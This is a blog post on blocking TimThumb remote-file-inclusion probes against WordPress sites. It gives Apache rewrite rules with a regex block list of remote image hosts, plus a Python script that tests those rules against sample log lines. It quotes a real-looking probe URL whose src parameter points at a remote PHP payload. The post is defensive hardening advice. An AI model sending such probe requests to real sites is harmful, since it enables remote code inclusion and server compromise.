Block external TimThumb requests

2012/04/09

After the TimThumb vulnerability from last year it happens often that “bad” bots try to hack your WordPress site, even if you never used the TimThumb script in your WordPress theme. These bots try to find a TimThumb script in your theme directory structure and also access many non-existing file locations. For your WordPress site that means a lot of 404 errors and, of course, a lot of unwanted database queries.
One part of the hack is that the bot adds a second “slash” to the request URL, which creates a redirect to the non-existing file location. If the hacker sends a lot of requests to your server, the site and server become slow and maybe your whole server runs out of memory.

While looking for a solution I found these rewrite rules, which are created by the BulletProof Security plugin. I don’t use that plugin for my sites because the rules created by the plugin are very complex. Add these rules to your .htaccess file (right after “RewriteEngine On”):

# TimThumb Forbid RFI By Host Name But Allow Internal Requests
# Match a remote URL (scheme, plain or %-encoded "://", optional "www.") pointing at one of the listed hosts,
# either in the query string or anywhere in the raw request line
RewriteCond %{QUERY_STRING} ^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?(blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|imageshack|wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|kkc|start-thegame).*$ [NC,OR]
RewriteCond %{THE_REQUEST} ^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?(blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|imageshack|wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|kkc|start-thegame).*$ [NC]
# Answer such requests with 403 Forbidden and stop rewriting
RewriteRule .* index.php [F,L]
# Requests for the thumbnail scripts themselves skip the next rule (S=1)
RewriteCond %{REQUEST_URI} (timthumb\.php|phpthumb\.php|thumb\.php|thumbs\.php) [NC]
RewriteRule . - [S=1]

Normally WordPress will load a 404 page for requests like:

/wp-content/themes/sometheme//functions/efrog/lib/timthumb.php?src=http://blogger.com.chicolisto.com/cok.php

With these rules only a 403 status is sent to the client and, more importantly, there is no redirect for the request URL with the double slash.
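To see which requests the two RewriteCond lines actually catch before putting them into production, it helps to replay the same expressions against request lines from an access log. The script below is an added example written for this post, not code from the author or from the BulletProof Security plugin: it copies the host alternation and the scheme/"://" prefix from the rules above into Python regexes, applies them the way mod_rewrite does (raw query string and raw request line, case-insensitive), and reports whether a request would get the 403, would skip the next rule, or would pass through to WordPress. The log lines and IP addresses are constructed samples; the first request is the one quoted above.

```python
import re
from urllib.parse import urlsplit

# Host alternation copied verbatim from the two RewriteCond lines.
RFI_HOSTS = (r"(blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|"
             r"imageshack|wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|"
             r"kkc|start-thegame)")

# Same expression as the RewriteCond: a scheme, a plain or %-encoded "://",
# up to three "w" characters plus one optional separator (covers "www."),
# then one of the listed hosts.  The [NC] flag becomes re.IGNORECASE.
RFI_PATTERN = re.compile(
    r"^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?" + RFI_HOSTS + r".*$",
    re.IGNORECASE,
)

# Second RewriteCond: the requested path names one of the thumbnail scripts.
THUMB_SCRIPT = re.compile(r"(timthumb\.php|phpthumb\.php|thumb\.php|thumbs\.php)",
                          re.IGNORECASE)


def decide(request_line):
    """Mirror the rules for one request line such as 'GET /a/b.php?src=... HTTP/1.1'.

    Returns one of:
      ("403", "rfi-host")       first RewriteRule fires, client receives 403 Forbidden
      ("skip-next-rule", path)  second RewriteRule fires (S=1), the following rule is skipped
      ("pass", path)            neither rule matched, the request continues to WordPress
    """
    _method, target, _proto = request_line.split(" ", 2)
    parts = urlsplit(target)
    # %{QUERY_STRING} and %{THE_REQUEST} are matched raw (not URL-decoded),
    # which is why the pattern accepts %3A and %2F as well as ":" and "/".
    if RFI_PATTERN.match(parts.query) or RFI_PATTERN.match(request_line):
        return ("403", "rfi-host")
    if THUMB_SCRIPT.search(parts.path):
        return ("skip-next-rule", parts.path)
    return ("pass", parts.path)


# Pulls the quoted request line out of an Apache combined-format log entry.
LOG_REQUEST = re.compile(r'"([A-Z]+ [^" ]+ HTTP/[0-9.]+)"')


def blocked_requests(log_lines):
    """Return the request lines from the given log entries that the rules would refuse with 403."""
    hits = []
    for line in log_lines:
        m = LOG_REQUEST.search(line)
        if m and decide(m.group(1))[0] == "403":
            hits.append(m.group(1))
    return hits


# Constructed sample log entries (not real traffic); the first request is the one quoted in the post.
SAMPLE_LOG = [
    '203.0.113.7 - - [09/Apr/2012:10:00:01 +0200] "GET /wp-content/themes/sometheme//functions/efrog/lib/timthumb.php?src=http://blogger.com.chicolisto.com/cok.php HTTP/1.1" 404 1234 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [09/Apr/2012:10:00:02 +0200] "GET /wp-content/themes/other/thumb.php?src=http%3A%2F%2Fwww.imgur.com%2Fx.php HTTP/1.1" 404 1234 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [09/Apr/2012:10:00:03 +0200] "GET /wp-content/themes/sometheme/timthumb.php?src=/wp-content/uploads/2012/04/a.jpg&w=120 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [09/Apr/2012:10:00:04 +0200] "GET /2012/04/block-external-timthumb-requests/ HTTP/1.1" 200 8000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for req in blocked_requests(SAMPLE_LOG):
        print("403", req)
```

Two things the replay makes visible: the first condition is a blocklist of specific host names, so a request that points the `src` parameter at any host not in the list is not refused and still reaches WordPress (where it produces the 404 described above), and a local thumbnail request that only names the script in the path is left alone apart from the S=1 skip. The mirror ignores mod_rewrite's per-directory prefix handling, so it checks only the two conditions, not the exact path of the substituted `index.php`.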
